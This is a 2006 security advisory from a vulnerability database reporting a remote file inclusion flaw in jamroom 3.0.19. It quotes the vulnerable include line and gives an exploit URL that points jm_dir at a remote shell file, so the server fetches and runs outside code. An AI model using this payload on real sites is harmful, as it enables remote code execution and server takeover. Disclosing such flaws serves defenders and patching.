Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14872
HistoryOct 31, 2006 - 12:00 a.m.

jamroom Remote File Include

2006-10-3100:00:00
vulners.com
27

#################################
#jamroom-3.0.19 #
#################################
#Class: Remote|Local File Include Vulnerability

Remote: Yes

Local: No

Type: High

$it£ :http://www.jamroom.net/Downloads3_Core

Author: x_w0x

Contact: [email protected]

#~~~~~~~~~~~~~Ramadan Karim All Musulman
###################################
#Vuln Code
=================jamroom-schema.inc.php================
require_once("{$jamroom['jm_dir']}/include/jamroom-writer.inc.php")
####################################

£xploit:

http://www.victim.com/[path]/include/jamroom-schema.inc.php?jamroom[jm_dir]=http://$h£ll.txt?

Solution

Define Your Vraiable

#Gr££tz : makok i, aZZcoder , xoron , osm@n
#Speciale gr££tz:[ str0k ] and elite-team

#w£lc0m£ In x0|0x
#by x_w0x

I am h£r£

#========================
#download
:http://www.jamroom.net/index.php?m=td_download&o=download&file_id=43
############################################################